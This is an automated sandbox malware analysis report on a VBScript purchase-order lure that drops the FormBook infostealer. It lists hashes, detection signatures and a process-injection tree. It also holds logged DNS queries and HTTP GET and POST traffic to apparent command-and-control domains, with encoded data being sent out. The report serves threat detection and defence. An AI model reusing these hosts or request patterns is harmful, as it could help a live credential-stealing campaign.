Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO1341489LTB GROUP.vbs

Overview

General Information

Sample name:PO1341489LTB GROUP.vbs
Analysis ID:1576423
MD5:fe2b1e9947e1f7ab65d6542ba1abccc0
SHA1:2753756f5438d94c49fad80ba14bb5440a4b260a
SHA256:d618b1d56fbd24ce3c15bfd5c238f9ad8695156667d4b6e04c378f8eca6e34d7
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (has network functionality)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6148 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 5796 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: D9A430A4C9B06A9C5F69147498335567)
      • aspnet_compiler.exe (PID: 6536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
        • JogKDBeJAc.exe (PID: 6000 cmdline: "C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • chkntfs.exe (PID: 5236 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
            • JogKDBeJAc.exe (PID: 4444 cmdline: "C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 2300 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", ProcessId: 6148, ProcessName: wscript.exe
            Sigma detected: AspNetCompiler Execution
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5796, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 6536, ProcessName: aspnet_compiler.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", ProcessId: 6148, ProcessName: wscript.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 55%
            Multi AV Scanner detection for submitted file
            Source: PO1341489LTB GROUP.vbsVirustotal: Detection: 26%Perma Link
            Source: PO1341489LTB GROUP.vbsReversingLabs: Detection: 21%
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
            Source: Binary string: chkntfs.pdbGCTL source: aspnet_compiler.exe, 00000003.00000002.2338526683.0000000001417000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000003.2277403116.00000000008A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JogKDBeJAc.exe, 00000005.00000002.3304097784.0000000000F9E000.00000002.00000001.01000000.00000009.sdmp, JogKDBeJAc.exe, 00000007.00000002.3303611302.0000000000F9E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.2338810334.0000000001870000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.000000000465E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2338493197.0000000004169000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2341050723.0000000004314000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, 00000003.00000002.2338810334.0000000001870000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.000000000465E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2338493197.0000000004169000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2341050723.0000000004314000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: aspnet_compiler.pdb source: chkntfs.exe, 00000006.00000002.3305493710.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3303352157.0000000002688000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000000.2407341039.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.000000001578C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: aspnet_compiler.exe, 00000003.00000002.2338526683.0000000001417000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000003.2277403116.00000000008A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: BNXCNJ22333.pdb source: wscript.exe, 00000000.00000003.2078207053.000001B7B4DE4000.00000004.00000020.00020000.00000000.sdmp, x.exe.0.dr

            Networking

            barindex
            Potential malicious VBS script found (has network functionality)
            Source: Initial file: adodbStream.SaveToFile executablePath, 2 ' adSaveCreateOverWrite
            Source: Joe Sandbox ViewIP Address: 52.60.87.163 52.60.87.163
            Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 17 Dec 2024 02:41:11 GMTserver: Apacheset-cookie: __tad=1734403271.6175629; expires=Fri, 15-Dec-2034 02:41:11 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 72 25 26 69 50 e4 bf 8f 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 f7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 5b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 95 c4 fc ee 5a ce f2 cf c9 22 8a f2 1c 6e 91 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 f7 28 b7 84 0c 7c e4 01 d5 00 b5 08 2f e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b 9b b1 54 3a 85 87 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 35 db 87 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 67 27 df 6f 59 87 a8 d3 87 ce 1a 45 96 43 ab 79 90 ed f1 18 32 9f b2 a2 c9 24 e3 26 98 b4 e9 a1 ac b8 5a b6 42 b6 33 7d 8a f3 cb c4 a1 df 6a 0a e7 0f 10 f6 23 b1 0b 3a 83 9d e4 fc 84 c8 76 ca 07 b2 6f f5 62 80 49 8d e2 d1 52 fa ec 6e 7a 3a 7d 5f bb 02 cd 90 10 74 1f 81 b1 b2 4d d1 b9 a1 e3 ff 7f 87 a1 ab 2f e7 8e 0e 3c ca b0 b4 35 37 1a 02 76 e5 ec d6 d4 f3 b3 cb d9 a5 bc ba 86 23 30 7a 00 71 da 78 2d 06 f4 72 25 ad b6 ae 8c cf 9a 61 c5 10 c6 96 b7 b3 61 f1 d0 16 b5 da c1 90 5b 26 b5 f2 ac fe 30 07 63 0d 2e 92 aa 10 d0 3a 6c ca b7 87 38 8c c3 55 52 7d d1 7c 08 2d 3a 1c a6 d5 10 ba 22 17 7c 85 98 84 a9 8c 1d 2d 15 1d 12 d7 e6 aa 17 78 b7 55 bb 32 66 1a 6e 7f 1b 03 4f 11 71 62 19 cf 16 f0 fb e6 47 f9 2e ea 8f e1 9a 3e 55 e7 1e 04 f3 43 2f c2 9f e2 2f 86 1b 7a 80 30 04 00 00 Data Ascii: TMo0=pvNQ;a"Yr%&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'[h'8CI2(!iyZ"n@6p5A5(|/Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#5`'kMs\g'oYECy2$&ZB3}j#:vobIRnz:}_tM/<57v#0zqx-r%aa[&0c.:l8UR}|-:"|-xU2fnOqbG.>UC//z0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 17 Dec 2024 02:41:14 GMTserver: Apacheset-cookie: __tad=1734403274.7988264; expires=Fri, 15-Dec-2034 02:41:14 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 72 25 26 69 50 e4 bf 8f 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 f7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 5b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 95 c4 fc ee 5a ce f2 cf c9 22 8a f2 1c 6e 91 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 f7 28 b7 84 0c 7c e4 01 d5 00 b5 08 2f e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b 9b b1 54 3a 85 87 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 35 db 87 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 67 27 df 6f 59 87 a8 d3 87 ce 1a 45 96 43 ab 79 90 ed f1 18 32 9f b2 a2 c9 24 e3 26 98 b4 e9 a1 ac b8 5a b6 42 b6 33 7d 8a f3 cb c4 a1 df 6a 0a e7 0f 10 f6 23 b1 0b 3a 83 9d e4 fc 84 c8 76 ca 07 b2 6f f5 62 80 49 8d e2 d1 52 fa ec 6e 7a 3a 7d 5f bb 02 cd 90 10 74 1f 81 b1 b2 4d d1 b9 a1 e3 ff 7f 87 a1 ab 2f e7 8e 0e 3c ca b0 b4 35 37 1a 02 76 e5 ec d6 d4 f3 b3 cb d9 a5 bc ba 86 23 30 7a 00 71 da 78 2d 06 f4 72 25 ad b6 ae 8c cf 9a 61 c5 10 c6 96 b7 b3 61 f1 d0 16 b5 da c1 90 5b 26 b5 f2 ac fe 30 07 63 0d 2e 92 aa 10 d0 3a 6c ca b7 87 38 8c c3 55 52 7d d1 7c 08 2d 3a 1c a6 d5 10 ba 22 17 7c 85 98 84 a9 8c 1d 2d 15 1d 12 d7 e6 aa 17 78 b7 55 bb 32 66 1a 6e 7f 1b 03 4f 11 71 62 19 cf 16 f0 fb e6 47 f9 2e ea 8f e1 9a 3e 55 e7 1e 04 f3 43 2f c2 9f e2 2f 86 1b 7a 80 30 04 00 00 Data Ascii: TMo0=pvNQ;a"Yr%&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'[h'8CI2(!iyZ"n@6p5A5(|/Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#5`'kMs\g'oYECy2$&ZB3}j#:vobIRnz:}_tM/<57v#0zqx-r%aa[&0c.:l8UR}|-:"|-xU2fnOqbG.>UC//z0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 17 Dec 2024 02:41:17 GMTserver: Apacheset-cookie: __tad=1734403277.4596934; expires=Fri, 15-Dec-2034 02:41:17 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 579content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 db 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 59 72 25 26 69 50 e4 bf 8f 72 dc 8f 75 87 56 17 5b d4 23 df 7b 34 e5 a2 a5 4e 57 51 d1 a2 a8 f9 41 8a 34 56 4b a7 e4 a6 55 5a fb cc 2b c2 22 3f 85 a3 c2 4b a7 7a 02 3a f4 58 c6 84 f7 94 af c5 4e 9c a2 31 78 27 cb 38 5f fb bc 51 66 85 ae 77 ca 50 ae 54 83 59 a7 4c b6 f6 71 55 e4 27 ec 5b a5 aa 68 27 1c 38 ac 95 43 49 7f b4 32 1b 28 21 69 89 fa 79 9e ef f7 fb ec 95 c4 fc ee 5a ce f2 cf c9 22 8a f2 1c 6e 91 40 00 a9 0e ed 96 c0 36 70 35 9b 41 a7 a4 b3 1e a5 35 b5 07 b2 80 f7 28 b7 84 0c 7c e4 01 d5 00 b5 08 2f e4 43 ef 6c a7 3c c7 84 d2 1e 1a eb c0 db 0e 39 45 78 6b a2 66 6b 24 29 6b f8 58 eb a5 90 9b 9b b1 54 3a 85 87 68 b2 57 a6 b6 fb 4c 5b 29 02 2a 73 d8 6b 21 31 fd c7 d8 79 d2 f4 e5 c5 a7 64 ba 88 8e 51 44 ee 10 32 59 a5 27 70 b5 fb 35 9a 28 c1 23 8d 9b f4 35 db 87 60 90 f3 27 a1 6b 4d ff 73 d4 5c c2 d7 67 27 df 6f 59 87 a8 d3 87 ce 1a 45 96 43 ab 79 90 ed f1 18 32 9f b2 a2 c9 24 e3 26 98 b4 e9 a1 ac b8 5a b6 42 b6 33 7d 8a f3 cb c4 a1 df 6a 0a e7 0f 10 f6 23 b1 0b 3a 83 9d e4 fc 84 c8 76 ca 07 b2 6f f5 62 80 49 8d e2 d1 52 fa ec 6e 7a 3a 7d 5f bb 02 cd 90 10 74 1f 81 b1 b2 4d d1 b9 a1 e3 ff 7f 87 a1 ab 2f e7 8e 0e 3c ca b0 b4 35 37 1a 02 76 e5 ec d6 d4 f3 b3 cb d9 a5 bc ba 86 23 30 7a 00 71 da 78 2d 06 f4 72 25 ad b6 ae 8c cf 9a 61 c5 10 c6 96 b7 b3 61 f1 d0 16 b5 da c1 90 5b 26 b5 f2 ac fe 30 07 63 0d 2e 92 aa 10 d0 3a 6c ca b7 87 38 8c c3 55 52 7d d1 7c 08 2d 3a 1c a6 d5 10 ba 22 17 7c 85 98 84 a9 8c 1d 2d 15 1d 12 d7 e6 aa 17 78 b7 55 bb 32 66 1a 6e 7f 1b 03 4f 11 71 62 19 cf 16 f0 fb e6 47 f9 2e ea 8f e1 9a 3e 55 e7 1e 04 f3 43 2f c2 9f e2 2f 86 1b 7a 80 30 04 00 00 Data Ascii: TMo0=pvNQ;a"Yr%&iPruV[#{4NWQA4VKUZ+"?Kz:XN1x'8_QfwPTYLqU'[h'8CI2(!iyZ"n@6p5A5(|/Cl<9Exkfk$)kXT:hWL[)*sk!1ydQD2Y'p5(#5`'kMs\g'oYECy2$&ZB3}j#:vobIRnz:}_tM/<57v#0zqx-r%aa[&0c.:l8UR}|-:"|-xU2fnOqbG.>UC//z0
            Source: global trafficHTTP traffic detected: GET /lvnw/?-V8=PnfuVDu+NOzkAh7O+7Vj27VnnoRWHWCWtKII0z0YG5WqqHdwEfQqR5XVQmQd5mG7F2k9Soh0q42Pqx1rEU++5lE1fyewpKHAvlydGXlffERlJmNtF5QLa6mLyqy4r6QOPw==&2H=b6QHb8C0WpQhtV HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.northidahoscans.onlineUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
            Source: global trafficHTTP traffic detected: GET /q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtV HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.brickhills.siteUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
            Source: global trafficHTTP traffic detected: GET /ocjg/?-V8=PsakXBZzgyoVbyp2hjDhUIAPjymto9iGXnTsMAFbSxg7wqJ/GaGLf9R1SWA0D+LwAwOTNpeqtTSBVw9+2LbbbxVu9AMo8WkIslXiFZquUVbpmyTV+kMBZINqQZENrlqOtg==&2H=b6QHb8C0WpQhtV HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.pin-ballerz.netUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
            Source: global trafficHTTP traffic detected: GET /83oq/?-V8=uON7WwvftimkH6+9fo1haamOfON2rQIMUfJSLV47BI3eNmd69pzs52jdBx/JPqPeVCXck41+K0Sv6SgSfr5VB9MDDVgyHUBPcljHHq+Df2KeZsyLZPWCaDvb78l21qpsnQ==&2H=b6QHb8C0WpQhtV HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.allstary.topUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
            Source: global trafficHTTP traffic detected: GET /nydx/?-V8=q7nzFJj3afdOFJJfiG7XJfkkRIbmdsBL0Xh9x7HOO1bMwAYpIu+EkXrpUMzqVtVwT+pWdZ8+fZkDpnUDi5L0pxX3zg/WB9ChebFWf29eE9HJh+d3M/EMfjpTQLNaei8vxw==&2H=b6QHb8C0WpQhtV HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.waytoocool.lifeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
            Source: global trafficHTTP traffic detected: GET /xsla/?-V8=hoxAaasoZBOD0j1KZ83XYOlI1AJE1doQvwEl/6A98KlFBwCru8LBuQoutmWPazGrcTbrOkYKG6VMwnANAgx3/U5cHXy83Zs53QS9fb9clXtmfZkgH8FbRqFEUKF+mnaT3w==&2H=b6QHb8C0WpQhtV HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.timai.shopUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
            Source: global trafficDNS traffic detected: DNS query: www.northidahoscans.online
            Source: global trafficDNS traffic detected: DNS query: www.brickhills.site
            Source: global trafficDNS traffic detected: DNS query: www.pin-ballerz.net
            Source: global trafficDNS traffic detected: DNS query: www.allstary.top
            Source: global trafficDNS traffic detected: DNS query: www.waytoocool.life
            Source: global trafficDNS traffic detected: DNS query: www.timai.shop
            Source: unknownHTTP traffic detected: POST /q6c0/ HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeCache-Control: max-age=0Host: www.brickhills.siteOrigin: http://www.brickhills.siteReferer: http://www.brickhills.site/q6c0/User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)Data Raw: 2d 56 38 3d 4f 50 41 54 45 68 6c 45 44 45 63 74 70 6f 69 4c 2b 66 63 72 41 2f 42 6e 43 45 53 63 64 55 67 49 39 39 32 33 49 66 2f 4a 4f 2b 74 4f 32 69 63 7a 68 47 61 73 39 6f 70 76 38 4b 70 2b 52 51 4f 4e 78 66 6a 53 71 4e 37 34 6d 6d 65 38 48 56 67 49 6f 6a 47 4d 43 56 49 6b 2b 6a 41 79 2b 66 47 75 4e 55 6c 6b 2f 6c 6a 6f 71 6c 33 6c 58 2b 4c 7a 43 37 46 45 5a 70 74 2b 4f 37 41 6d 4f 4c 69 71 4c 4e 46 4b 58 71 51 74 4c 76 33 57 4b 66 33 4a 4a 65 56 6f 57 41 38 78 6f 6b 64 41 4a 5a 66 4d 2f 52 5a 63 4e 72 79 38 74 35 4e 67 6d 69 2b 31 6a 54 38 6a 31 4e 35 44 4f 6a 62 4c 37 38 38 2b 4f 53 53 58 67 30 51 3d Data Ascii: -V8=OPATEhlEDEctpoiL+fcrA/BnCEScdUgI9923If/JO+tO2iczhGas9opv8Kp+RQONxfjSqN74mme8HVgIojGMCVIk+jAy+fGuNUlk/ljoql3lX+LzC7FEZpt+O7AmOLiqLNFKXqQtLv3WKf3JJeVoWA8xokdAJZfM/RZcNry8t5Ngmi+1jT8j1N5DOjbL788+OSSXg0Q=
